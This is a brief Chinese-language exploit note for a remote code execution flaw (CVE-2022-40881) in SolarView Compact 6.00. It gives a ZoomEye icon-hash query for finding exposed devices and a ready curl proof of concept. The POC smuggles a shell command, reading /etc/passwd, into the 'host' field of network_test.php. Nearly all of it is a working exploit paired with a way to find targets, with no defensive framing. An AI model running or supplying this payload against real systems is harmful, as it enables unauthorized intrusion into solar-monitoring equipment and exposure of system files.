SolarView6.00远程代码执行(CVE-2022-40881)
ZoomEye搜索iconhash:“-244067125”
参考https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php
POC:
curl -i -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'host=%0acat${IFS}/etc/passwd%0a&command=ping' 'http://ip:port/network_test.php' |grep root